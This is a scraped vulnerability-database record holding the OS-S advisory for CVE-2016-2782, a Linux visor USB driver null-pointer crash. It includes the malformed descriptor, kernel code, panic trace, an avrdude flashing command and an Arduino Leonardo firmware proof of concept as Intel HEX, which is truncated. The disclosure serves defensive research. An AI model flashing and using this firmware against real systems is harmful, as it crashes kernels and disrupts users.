1010900019F0883721F0AFC02F2F2061B22EB4FE97\r\n:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D\r\n:1010B0009660B92E06C028E030E005C020E130E09F\r\n:1010C00002C020E132E0F801B7FE07C06081718103\r\n:1010D000828193810C5F1F4F06C06081718180E027\r\n:1010E00090E00E5F1F4FA4010E944D09A82EA81882\r\n:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428\r\n:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0\r\n:101110007A2C2B2D03C07A2C01C0752C24FF0DC016\r\n:10112000FE01EA0DF11D8081803311F4297E09C092\r\n:1011300022FF06C07394739404C0822F867809F04E\r\n:10114000739423FD13C020FF06C05A2C731418F4A7\r\n:10115000530C5718732C731468F4B70180E290E0B5\r\n:101160002C870E941B0973942C85F5CF731410F4FF\r\n:10117000371801C0312C24FF12C0B70180E390E082\r\n:101180002C870E941B092C8522FF17C021FF03C05A\r\n:1011900088E590E002C088E790E0B7010CC0822F9C\r\n:1011A000867859F021FD02C080E201C08BE227FD64\r\n:1011B0008DE2B70190E00E941B09A51438F4B70135\r\n:1011C00080E390E00E941B095A94F7CFAA94F4019F\r\n:1011D000EA0DF11D8081B70190E00E941B09A1106A\r\n:1011E000F5CF332009F451CEB70180E290E00E94A0\r\n:1011F0001B093A94F6CFF7018681978102C08FEFE1\r\n:101200009FEF2C96E2E10C94CD09FC010590615012\r\n:1012100070400110D8F7809590958E0F9F1F08950C\r\n:10122000FC016150704001900110D8F780959095B5\r\n:101230008E0F9F1F08950F931F93CF93DF93182F47\r\n:10124000092FEB018B8181FD03C08FEF9FEF20C041\r\n:1012500082FF10C04E815F812C813D814217530770\r\n:101260007CF4E881F9819F012F5F3F4F3983288308\r\n:10127000108306C0E885F985812F0995892B29F708\r\n:101280002E813F812F5F3F4F3F832E83812F902FF1\r\n:10129000DF91CF911F910F910895FA01AA2728306D\r\n:1012A00051F1203181F1E8946F936E7F6E5F7F4F33\r\n:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF\r\n:1012C000781F891F9A1FA11D680F791F8A1F911D02\r\n:1012D000A11D6A0F711D811D911DA11D20D009F452\r\n:1012E00068943F912AE0269F11243019305D319394\r\n:1012F000DEF6CF010895462F4770405D4193B3E07D\r\n:101300000FD0C9F7F6CF462F4F70405D4A3318F023\r\n:10131000495D31FD4052419302D0A9F7EACFB4E0D4\r\n:10132000A6959795879577956795BA95C9F700978C\r\n:101330006105710508959B01AC010A2E069457952D\r\n:10134000479537952795BA95C9F7620F731F841F84\r\n:10135000951FA01D0895EE0FFF1F0590F491E02D3D\r\n:1013600009942F923F924F925F926F927F928F9249\r\n:101370009F92AF92BF92CF92DF92EF92FF920F9324\r\n:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E\r\n:10139000F894DEBF0FBECDBF09942A8839884888EB\r\n:1013A0005F846E847D848C849B84AA84B984C88481\r\n:1013B000DF80EE80FD800C811B81AA81B981CE0F78\r\n:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D\r\n:0413D000F894FFCFBF\r\n:1013D4001201000200000040AD0BEFBE000101024B\r\n:1013E4000001220342006100640020004200410029\r\n:1013F40042004500250078002500780025006E0095\r\n:1014040025007000180342004100440020004300FE\r\n:10141400300046004600450045002100120100024C\r\n:10142400000000402D08000200010102030109022E\r\n:10143400270001010000FA0705810304040C0705D5\r\n:10144400010204000C0705820104000C07000700D8\r\n:101454000700480100500072006F006C00690066CC\r\n:101464000069006300000A550000006BFD180A00C3\r\n:10147400809F0AB901312B940A8101128946001315\r\n:10148400000257028B0A5E0AF80A5F01F212010099\r\n:1014940002010000400D055702000101020301B9D9\r\n:1014A4000A0100F80A5F0A810A220342006100640B\r\n:1014B400002000420041004200450025007800253C\r\n:1014C40000780025006E00250070001803420041DA\r\n:1014D400004400200043003000460046004500451B\r\n:1014E40000210012010002010000400D0557020016\r\n:1014F400010102030109040000030100000003F2DA\r\n:101504000AEC0A0902270001010000FA01AB0A09EA\r\n:101514000400000301000000090200202020202014\r\n:101524005F5F5F5F5F5F5F5F2020202020202020BF\r\n:1015340020202020202020202020202020202020A7\r\n:1015440020205F5F5F5F5F205F5F20205F2020209F\r\n:101554002020205F5F0A0D00202020202F205F5FC5\r\n:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3\r\n:101574005F5F20205F5F5F5F5F20202020202F209F\r\n:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3\r\n:10159400202F5F5F0A0D002020202F202F202020E5\r\n:1015A4002F205F5F205C2F205F5F20602F205F5F14\r\n:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A\r\n:1015C400205C2F205F5F2F202F205F5F5F2F202F55\r\n:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009\r\n:1015E4002F202F202F202F5F2F202F202F5F2F2001\r\n:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0\r\n:101604002F202F5F2F202F202F5F5F2F202C3C0AAD\r\n:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07\r\n:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F\r\n:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4\r\n:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044\r\n:101654003C3C2043485241534820414E59204F506E\r\n:1016640045524154494E472053595354454D203E09\r\n:101674003E0A0D00203C3C202863292053657267F4\r\n:10168400656A20536368756D696C6F20323031353B\r\n:101694002C204F70656E536F7572636520536563BC\r\n:1016A40075726974792052616C66205370656E6E30\r\n:1016B4006562657267203E3E0A0D000A3E3E205078\r\n:1016C4007265737320627574746F6E20746F207307\r\n:1016D4007461727420657865637574696F6E2E2EFB\r\n:1016E4002E0A0D005B44454255475D2045786563ED\r\n:1016F400757465207061796C6F616420300A0D0027\r\n:10170400526563762D446174613A0A0D005B444569\r\n:101714004255475D200953656E6420436F6E6669C8\r\n:101724006775726174696F6E44657363726970740E\r\n:101734006F720928696E6465783A2569292E2E2E00\r\n:101744000D0A005B44454255475D200953656E64AC\r\n:1017540020496E74657266616365204465736372C3\r\n:101764006970746F720928696E7465726661636565\r\n:101774003A2569292E2E2E0D0A005B444542554711\r\n:101784005D200953656E6420456E64706F696E74E4\r\n:101794002044657363726970746F720928656E649E\r\n:1017A400706F696E743A2569292E2E2E0D0A005B1E\r\n:1017B40044454255475D203C3C70616E6963206D31\r\n:1017C4006F64653F3E3E0D0A005B44454255475DEC\r\n:1017D4002009203E3E20537472696E67204465736D\r\n:1017E40063726970746F72207265717565737420A9\r\n:1017F4002D2073656E64696E67206D616C666F720F\r\n:101804006D656420737472696E67212073657475E5\r\n:10181400702E7756616C75654C203D3D2025690D11\r\n:101824000A005B48455844554D505D0A0D0025306B\r\n:041834003258200006\r\n:00000001FF\n\n# 0day.today [2018-01-26] #", "sourceHref": "https://0day.today/exploit/25870", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:12:59", "description": "", "cvss3": {}, "published": "2016-03-12T00:00:00", "type": "packetstorm", "title": "Linux visor (treo_attach) Null Pointer Dereference", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-2782"], "modified": "2016-03-12T00:00:00", "id": "PACKETSTORM:136218", "href": "https://packetstormsecurity.com/files/136218/Linux-visor-treo_attach-Null-Pointer-Dereference.html", "sourceData": "`OS-S Security Advisory 2016-10 \nLinux visor (treo_attach) Nullpointer Dereference \n \nDate: March 4th, 2016 \nAuthors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg \nCVE: CVE-2016-2782 \nCVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C) \nTitle: Local RedHat Enterprise Linux DoS \u2013 RHEL 7.1 Kernel crashes on invalid \nUSB device descriptors (visor treo_attach driver) \nSeverity: Critical. The Kernel panics. A reboot is required. \nEase of Exploitation: Trivial \nVulnerability type: Wrong input validation \nProducts: RHEL 7.1 including all updates \nKernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the \nCentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7) \nVendor: Red Hat \nVendor contacted: November, 12th 2015 \nPDF of the advisory: https://os-s.net//advisories/OSS-2016-14_gtco.pdf \n \nAbstract: \nThe Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB \ndevice requiring the visor (treo_attach) driver. \n \nDetailed product description: \nWe confirmed the bug on the following system: \nRHEL 7.1 \nKernel 3.10.0-229.20.1.el7.x86_64 \nFurther products or kernel versions have not been tested. \nHow reproducible: Always \nActual results: Kernel crashes. \n \nDescription: \nThe bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo \n(github.com/schumilo) using the following device descriptor: \n \n[*] Device-Descriptor \nbLength: 0x12 \nbDescriptorType: 0x1 \nbcdUSB: 0x200 \nbDeviceClass: 0x3 \nbDeviceSubClass: 0x0 \nbDeviceProtocol: 0x0 \nbMaxPacketSize: 0x40 \nidVendor: 0x82d \nidProduct: 0x200 \nbcdDevice: 0x100 \niManufacturer: 0x1 \niProduct: 0x2 \niSerialNumbers: 0x3 \nbNumConfigurations: 0x1 \n \n \n \nThe treo_attach function does not use the num_ports (struct usb_serial) value \nfor any kind of sanity checks during the initialization process. Due to an \nincomplete sanity check, the driver could try to dereference a null-pointer if \na malformed device-descriptor is presented (zero-value for bNumEndpoints or no \nrequired endpoint-descriptors is provided). \nThis results in a crash of the system. \n \n \n \n \n**** \n... \n554 #define COPY_PORT(dest, src) \\ \n555 do { \\ \n556 int i; \\ \n557 \\ \n558 for (i = 0; i < ARRAY_SIZE(src->read_urbs); ++i) { \\ \n559 dest->read_urbs[i] = src->read_urbs[i]; \\ /* Possible \nNullpointer-Dereference */ \n560 dest->read_urbs[i]->context = dest; \\ \n561 dest->bulk_in_buffers[i] = src->bulk_in_buffers[i]; \\ \n562 } \\ \n563 dest->read_urb = src->read_urb; \\ \n564 dest->bulk_in_endpointAddress = src->bulk_in_endpointAddress;\\ \n565 dest->bulk_in_buffer = src->bulk_in_buffer; \\ \n566 dest->bulk_in_size = src->bulk_in_size; \\ \n567 dest->interrupt_in_urb = src->interrupt_in_urb; \\ \n568 dest->interrupt_in_urb->context = dest; \\ \n569 dest->interrupt_in_endpointAddress = \\ \n570 src->interrupt_in_endpointAddress;\\ \n571 dest->interrupt_in_buffer = src->interrupt_in_buffer; \\ \n572 } while (0); \n573 \n574 swap_port = kmalloc(sizeof(*swap_port), GFP_KERNEL); \n575 if (!swap_port) \n576 return -ENOMEM; \n577 COPY_PORT(swap_port, serial->port[0]); /* no sanity-check! */ \n578 COPY_PORT(serial->port[0], serial->port[1]); /* no sanity-check! */ \n579 COPY_PORT(serial->port[1], swap_port); /* no sanity-check! */ \n... \n**** \n \n \n[*] Configuration-Descriptor \nbLength: 0x9 \nbDescriptorType: 0x2 \nwTotalLength: 0x27 \nbNumInterfaces: 0x1 \nbConfigurationValue: 0x1 \niConfiguration: 0x0 \nbmAttributes: 0x0 \nbMaxPower: 0x31 \n[*] Interface-Descriptor \nbLength: 0x9 \nbDescriptorType: 0x4 \nbInterfaceNumber: 0x0 \nbAlternateSetting: 0x0 \nbNumEndpoints: 0x3 \nbInterfaceClass: 0x0 \nbInterfaceSubClass: 0x0 \nbInterfaceProtocol: 0x0 \n[*] Endpoint-Descriptor: \nbLength: 0x7 \nbDescriptorType: 0x5 \nbEndpointAddress: 0x81 \nbmAttribut: 0x3 \nwMaxPacketSize: 0x404 \nbInterval: 0xc \n[*] Endpoint-Descriptor: \nbLength: 0x7 \nbDescriptorType: 0x5 \nbEndpointAddress: 0x1 \nbmAttribut: 0x2 \nwMaxPacketSize: 0x4 \nbInterval: 0xc \n[*] Endpoint-Descriptor: \nbLength: 0x7 \nbDescriptorType: 0x5 \nbEndpointAddress: 0x82 \nbmAttribut: 0x1 \nwMaxPacketSize: 0x4 \nbInterval: 0xc \n \nProof of Concept: \nFor a proof of concept, we are providing an Arduino Leonardo firmware file. This \nfirmware will emulate the defective USB device. \n \n \navrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U \nflash:w:binary.hex \n \n \nThe firmware has been attached to this bug report. \nTo prevent the automated delivery of the payload, a jumper may be used to \nconnect port D3 and 3V3! \n \nSeverity and Ease of Exploitation: \nThe vulnerability can be easily exploited. Using our Arduino Leonardo firmware, \nonly physical access to the system is required. \n \nVendor Communication: \nWe contacted Red Hat on the November, 12th 2015. \nThis bug was fixed upstream. A CVE number was not assigned. \n \nReferences: \nhttps://bugzilla.redhat.com/show_bug.cgi?id=1283374 \nhttp://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=cac9b50b0d75a1d50d6c056ff65c005f3224c8e0 \n \n \nKernel Stacktrace: \n \n[ 35.176832] usb 1-1: new full-speed USB device number 2 using xhci_hcd \n[ 35.400183] usb 1-1: New USB device found, idVendor=082d, idProduct=0200 \n[ 35.407780] usb 1-1: New USB device strings: Mfr=1, Product=2, \nSerialNumber=3 \n[ 35.417186] usb 1-1: Product: \u0109 \n[ 35.421846] usb 1-1: Manufacturer: \u0109 \n[ 35.425686] usb 1-1: SerialNumber: % \n[ 35.438608] usb 1-1: ep 0x81 - rounding interval to 64 microframes, ep desc \nsays 96 microframes \n[ 35.493316] usbcore: registered new interface driver visor \n[ 35.503150] usbserial: USB Serial support registered for Handspring Visor / \nPalm OS \n[ 35.512980] usbserial: USB Serial support registered for Sony Clie 5.0 \n[ 35.521056] usbserial: USB Serial support registered for Sony Clie 3.5 \n[ 35.535245] visor 1-1:1.0: Handspring Visor / Palm OS converter detected \n[ 35.542409] BUG: unable to handle kernel NULL pointer dereference at \n00000000000000b0 \n[ 35.543244] IP: [<ffffffffa0393651>] treo_attach+0x61/0x340 [visor] \n[ 35.543244] PGD 0 \n[ 35.543244] Oops: 0002 [#1] SMP \n[ 35.543244] Modules linked in: visor(+) ip6t_rpfilter ip6t_REJECT ipt_REJECT \nxt_conntrack ebtable_nat ebtable_broute bridge stp llc ebtable_filter ebtables \nip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle \nip6table_security ip6table_raw ip6table_filter ip6_tables iptable_nat \nnf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack \niptable_mangle iptable_security iptable_raw iptable_filter ip_tables bochs_drm \nppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper drm pcspkr i2c_piix4 \ni2c_core serio_raw parport_pc parport xfs libcrc32c sd_mod sr_mod crc_t10dif \ncdrom crct10dif_common ata_generic pata_acpi ata_piix libata e1000 floppy \ndm_mirror dm_region_hash dm_log dm_mod \n[ 35.543244] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted \n3.10.0-229.14.1.el7.x86_64 #1 \n[ 35.543244] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS \nrel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 \n[ 35.543244] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000 \n[ 35.543244] RIP: 0010:[<ffffffffa0393651>] [<ffffffffa0393651>] \ntreo_attach+0x61/0x340 [visor] \n[ 35.543244] RSP: 0018:ffff88000bd23a78 EFLAGS: 00010286 \n[ 35.543244] RAX: ffff88000003c000 RBX: ffff88000af979c0 RCX: 000000000000a0e2 \n[ 35.543244] RDX: 0000000000000000 RSI: 00000000000000d0 RDI: ffff88000e401400 \n[ 35.543244] RBP: ffff88000bd23a80 R08: 00000000000164c0 R09: ffff88000e401400 \n[ 35.543244] R10: ffffffffa0393636 R11: ffff88000bcd0000 R12: 0000000000000404 \n[ 35.543244] R13: ffff88000be6b000 R14: ffff88000af979c0 R15: ffffffffa0395400 \n[ 35.543244] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) \nknlGS:0000000000000000 \n[ 35.543244] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b \n[ 35.543244] CR2: 00000000000000b0 CR3: 000000000c51f000 CR4: \n00000000000006f0 \n[ 35.543244] DR0: 0000000000000000 DR1: 0000000000000000 DR2: \n0000000000000000 \n[ 35.543244] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 \n[ 35.543244] Stack: \n[ 35.543244] ffff88000bcd0090 ffff88000bd23c18 ffffffff8145fed1 0000000000000007 \n[ 35.543244] 000000020bd23af8 ffff88000c525830 0000000100000000 ffffffffa0395400 \n[ 35.543244] 0000010000000001 ffff88000bcd0000 0000000000000100 \nffff88000bcd0090 \n[ 35.543244] Call Trace: \n[ 35.543244] [<ffffffff8145fed1>] usb_serial_probe+0xdb1/0x1230 \n[ 35.543244] [<ffffffff812d649c>] ? ida_get_new_above+0x7c/0x2a0 \n[ 35.543244] [<ffffffff811aba6a>] ? kmem_cache_alloc+0x1ba/0x1d0 \n[ 35.543244] [<ffffffff8123e5b2>] ? sysfs_addrm_finish+0x42/0xe0 \n[ 35.543244] [<ffffffff8123e391>] ? __sysfs_add_one+0x61/0x100 \n[ 35.543244] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0 \n[ 35.543244] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390 \n[ 35.543244] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0 \n[ 35.543244] [<ffffffff813d3420>] ? __device_attach+0x40/0x40 \n[ 35.543244] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0 \n[ 35.543244] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20 \n[ 35.543244] [<ffffffff8145ec4b>] usb_serial_register_drivers+0x29b/0x580 \n[ 35.543244] [<ffffffffa0398000>] ? 0xffffffffa0397fff \n[ 35.543244] [<ffffffffa039801e>] usb_serial_module_init+0x1e/0x1000 [visor] \n[ 35.543244] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230 \n[ 35.543244] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40 \n[ 35.543244] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0 \n[ 35.543244] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150 \n[ 35.543244] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0 \n[ 35.543244] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b \n[ 35.543244] Code: e1 ba 50 05 00 00 be d0 00 00 00 e8 4a 84 e1 e0 48 85 c0 \n0f 84 e1 02 00 00 48 8b 53 20 48 8b 92 b8 01 00 00 48 89 90 b8 01 00 00 <48> \n89 82 b0 00 00 00 48 8b 53 20 48 8b 92 a8 01 00 00 48 89 90 \n[ 35.543244] RIP [<ffffffffa0393651>] treo_attach+0x61/0x340 [visor] \n[ 35.543244] RSP <ffff88000bd23a78> \n[ 35.543244] CR2: 00000000000000b0 \n[ 35.973188] ---[ end trace b239663354a1c556 ]--- \n[ 35.978862] Kernel panic - not syncing: Fatal exception \n[ 35.979835] drm_kms_helper: panic occurred, switching back to text console \n \n \nArduino Leonardo Firmware: \n \n:100000000C94A8000C94C5000C94C5000C94C50079 \n:100010000C94C5000C94C5000C94C5000C94C5004C \n:100020000C94C5000C94C5000C94C4050C942F04CA \n:100030000C94C5000C94C5000C94C5000C94C5002C \n:100040000C94C5000C94C5000C94C5000C94C5001C \n:100050000C94C5000C94C5000C94C5000C940E02C1 \n:100060000C94C5000C94C5000C94C5000C94C500FC \n:100070000C94C5000C94C5000C94C5000C94C500EC \n:100080000C94C5000C94C5000C94C5000C94C500DC \n:100090000C94C5000C94C5000C94C5000C94C500CC \n:1000A0000C94C5000C94C5000C94C5000B030E0302 \n:1000B000010305032F032F032F03120316031A0353 \n:1000C000200324032F032A030000000200080E006F \n:1000D00000030401000B000000000000000000000D \n:1000E00000000000000004080201104080401020C1 \n:1000F00040804080080204018040201002011080EE \n:100100001020404004040404040304050202020217 \n:1001100004030202020206060606060604040202A0 \n:100120000204000000002300260029002C002F00FC \n:1001300000000000250028002B002E0031000000E8 \n:100140000000240027002A002D00300000C180811B \n:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077 \n:10016000B1E0E4EDF3E102C005900D92A436B107D1 \n:10017000D9F725E0A4E6B5E001C01D92AF37B2077C \n:10018000E1F70E94C8000C9404070C940000089545 \n:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421 \n:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B \n:1001B00083E00E94300361E087E00E94300361E049 \n:1001C00088E00E9430030E9459067E012AE9E20E6F \n:1001D000F11C84E093E0D70111969C938E9389E003 \n:1001E00094E013969C938E93129782E2E2E1F1E001 \n:1001F0009E012F5F3F4F6901D90101900D928A95B1 \n:10020000E1F788E1E4E3F1E0DE01939601900D92DD \n:100210008A95E1F782E1ECE4F1E0DE01DB96019002 \n:100220000D928A95E1F789E0EEE5F1E0DE01A05953 \n:10023000BF4F01900D928A95E1F72A593F4F99E0FF \n:10024000992ED901E92D1D92EA95E9F78E010957FA \n:100250001F4F87E0E7E6F1E0D80101900D928A9503 \n:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189 \n:1002700001900D928A95E1F7AE0147585F4F87E0F4 \n:10028000E5E7F1E0DA0101900D928A95E1F75E0170 \n:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D \n:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172 \n:1002B0001D92EA95E9F7E3E0DC011996EC93D90188 \n:1002C0009C92F4E01196FC9311971496EC93F9012B \n:1002D000DC01292D01900D922A95E1F7FE01EC56E3 \n:1002E000FF4FDC011B96FC93EE931A971D96BC9270 \n:1002F000AE921C971183008373836283558344837A \n:100300000C5211092CE0F80111922A95E9F721E02D \n:10031000D80119962C931997FE01E059FF4F0190CF \n:100320000D929A94E1F7F8019387828761E088E063 \n:100330000E9469038BE492E00E94650688E892E0DF \n:100340000E94650687EC92E00E94650686E093E0D5 \n:100350000E94650682E493E00E9465068FE793E0C1 \n:100360000E94650684EA93E00E9465068BEE93E0A6 \n:100370000E94650683E00E949F03892B09F047C015 \n:100380005E01F3E2AF0EB11C8824839482E1982EC3 \n:1003900084E194E00E946506BF92AF92DF92CF9213 \n:1003A000FF92EF921F928F921F930F932DB73EB73C \n:1003B000225131090FB6F8943EBF0FBE2DBFADB725 \n:1003C000BEB71196FE01FB96892D01900D928A957C \n:1003D000E1F78DE695E00E94030668E873E180E0AE \n:1003E00090E00E947B028DE695E00E944E0660E060 \n:1003F00087E00E94690368E873E180E090E00E9472 \n:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E \n:1004100070E080E090E00E947B02ACCF1F920F92D0 \n:100420000FB60F9211242F933F938F939F93AF9307 \n:10043000BF938091650590916605A0916705B09185 \n:1004400068053091640523E0230F2D3720F40196D1 \n:10045000A11DB11D05C026E8230F0296A11DB11DE7 \n:10046000209364058093650590936605A0936705C6 \n:10047000B09368058091690590916A05A0916B051C \n:10048000B0916C050196A11DB11D809369059093F3 \n:100490006A05A0936B05B0936C05BF91AF919F91D6 \n:1004A0008F913F912F910F900FBE0F901F90189535 \n:1004B0003FB7F8948091690590916A05A0916B050A \n:1004C000B0916C0526B5A89B05C02F3F19F0019689 \n:1004D000A11DB11D3FBF6627782F892F9A2F620F6C \n:1004E000711D811D911D42E0660F771F881F991FA6 \n:1004F0004A95D1F70895CF92DF92EF92FF92CF9372 \n:10050000DF936B017C010E945802EB01C114D104FE \n:10051000E104F10479F00E9458026C1B7D0B683EE7 \n:100520007340A0F381E0C81AD108E108F108C8516E \n:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029 \n:100540000895789484B5826084BD84B5816084BD4B \n:1005500085B5826085BD85B5816085BDEEE6F0E03C \n:10056000808181608083E1E8F0E010828081826098 \n:100570008083808181608083E0E8F0E08081816019 \n:100580008083E1E9F0E08081826080838081816006 \n:100590008083E0E9F0E0808181608083E1ECF0E03D \n:1005A000808184608083808182608083808181609B \n:1005B0008083E3ECF0E0808181608083E0ECF0E018 \n:1005C000808182608083E2ECF0E0808181608083C2 \n:1005D000EAE7F0E0808184608083808182608083AC \n:1005E000808181608083808180688083089590E02D \n:1005F000FC013197EE30F10590F5EA5AFF4F0C946B \n:10060000AB09809180008F7703C0809180008F7D3F \n:1006100080938000089584B58F7702C084B58F7D64 \n:1006200084BD0895809190008F7707C080919000DD \n:100630008F7D03C080919000877F80939000089504 \n:100640008091C0008F7703C08091C0008F7D809320 \n:10065000C00008958091C200877F8093C2000895F2 \n:10066000CF93DF9390E0FC01EA51FF4F2491FC010E \n:10067000EC5FFE4F8491882349F190E0880F991F29 \n:10068000FC01E25CFE4FA591B491805D9E4FFC01A0 \n:10069000C591D4919FB7611108C0F8948C912095B1 \n:1006A00082238C93888182230AC0623051F4F894AB \n:1006B0008C91322F309583238C938881822B888371 \n:1006C00004C0F8948C91822B8C939FBFDF91CF91C3 \n:1006D00008950F931F93CF93DF931F92CDB7DEB78B \n:1006E000282F30E0F901E853FF4F8491F901EA51D6 \n:1006F000FF4F1491F901EC5FFE4F04910023C9F004 \n:10070000882321F069830E94F7026981E02FF0E0DD \n:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7 \n:100720008C91611103C01095812301C0812B8C93A2 \n:100730009FBF0F90DF91CF911F910F910895CF939D \n:10074000DF93282F30E0F901E853FF4F8491F9013E \n:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5 \n:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5 \n:10077000EE5DFE4FA591B4912C912D2381E090E088 \n:1007800021F480E002C080E090E0DF91CF910895F5 \n:10079000615030F02091F100FC0120830196F8CFE8 \n:1007A000289884E680937D0508951092E9001092C0 \n:1007B00071051092700590936F0580936E050895F2 \n:1007C000FF920F931F93CF93DF93F82E8B01EA01D3 \n:1007D000BA01C8010E94A606F80120E030E08EEFC1 \n:1007E0002C173D0791F1F7FE02C0A49101C0A08132 \n:1007F000609170057091710540916E0550916F0583 \n:1008000064177507ACF49091E8009570E1F390914E \n:10081000E80092FD1CC0A093F100A0917005B0917A \n:1008200071051196AF73BB27AB2B11F48093E800D1 \n:10083000A0917005B09171051196B0937105A093C8 \n:1008400070052F5F3F4F3196CBCFC90102C08FEFAC \n:100850009FEFDF91CF911F910F91FF9008951F920D \n:100860000F920FB60F9211246F927F928F929F92E8 \n:10087000AF92BF92CF92DF92EF92FF920F931F93AE \n:100880002F933F934F935F936F937F938F939F9398 \n:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3 \n:1008A0006297DEBFCDBF1092E9008091E80083FF20 \n:1008B00046C168E0CE010A960E94C80382EF809389 \n:1008C000E8009A8597FF05C08091E80080FFFCCF83 \n:1008D00003C08EEF8093E800892F807609F023C152 \n:1008E0008B85811105C01092F1001092F10020C19A \n:1008F000282F2D7F213009F41BC1853049F48091C8 \n:10090000E80080FFFCCF8C8580688093E30010C1F5 \n:10091000863009F0E1C02D8508891989223009F057 \n:10092000B3C0EC848E2D90E0209173053091740556 \n:10093000821793070CF09FC00E94D5031F92EF927D \n:100940008DE394E09F938F930E9483068CE0E89E52 \n:1009500070011124E0917505F0917605EE0DFF1DF3 \n:1009600089E0DE01119601900D928A95E1F7C801A8 \n:100970000E94D50349E050E0BE016F5F7F4F80E0E9 \n:100980000E94E0030F900F900F900F90C12CD12C7C \n:10099000612C712C33E7A32E34E0B32E4AEA842E67 \n:1009A00044E0942EE0917505F0917605EE0DFF1D63 \n:1009B000818590E0681679060CF0BAC07F926F923C \n:1009C000BF92AF920E948306E0917505F091760583 \n:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5 \n:1009E00080E00E94E0030F900F900F900F9000E0C6 \n:1009F00010E0E0917505F0917605EE0DFF1D028483 \n:100A0000F385E02DEC0DFD1D818590E00817190799 \n:100A10005CF51F930F939F928F920E948306E09143 \n:100A20007505F0917605EE0DFF1D0284F385E02D2E \n:100A3000EC0DFD1DC801880F991FA485B585A80F71 \n:100A4000B91F4D915C910284F385E02DE80FF91FE9 \n:100A50006081718180E00E94E0030F5F1F4F0F9063 \n:100A60000F900F900F90C5CF8FEF681A780A8EE025 \n:100A7000C80ED11C97CF8FED94E09F938F930E9467 \n:100A800083060F900F9058C0C8012A8B0E94D5038F \n:100A90002A892130C1F0233009F04EC08C851F9285 \n:100AA0008F9389EF94E09F938F930E94830642E097 \n:100AB00050E062E871E080E00E94E0030F900F9048 \n:100AC0000F900F9035C04091000150E060E071E060 \n:100AD00080E00E94E0032CC0873071F1883021F45F \n:100AE00081E08093F10024C0893011F5937021F5E5 \n:100AF000EDE4F1E081E021E096E38093E9002093CA \n:100B0000EB0034913093EC009093ED008F5F3196C1 \n:100B1000843099F78EE78093EA001092EA008C8582 \n:100B20008093720505C0888999890E94D50304C005 \n:100B30008EEF8093E80003C081E28093EB00629621 \n:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE \n:100B5000EF91BF91AF919F918F917F916F915F9135 \n:100B60004F913F912F911F910F91FF90EF90DF9048 \n:100B7000CF90BF90AF909F908F907F906F900F908D \n:100B80000FBE0F901F9018951F920F920FB60F92E5 \n:100B900011248F939F938091E1001092E10083FFD5 \n:100BA0000FC01092E90091E09093EB001092EC00DE \n:100BB00092E39093ED001092720598E09093F0000C \n:100BC00082FF1AC080917E05882339F080917E05CE \n:100BD000815080937E05882369F080917D0588236C \n:100BE00059F080917D05815080937D05811104C06D \n:100BF000289A02C05D9AF1CF9F918F910F900FBEFE \n:100C00000F901F901895CF93DF93CDB7DEB782E199 \n:100C1000FE013596A0E0B1E001900D928A95E1F7D2 \n:100C20008F89988D9093760580937505898D9A8D1F 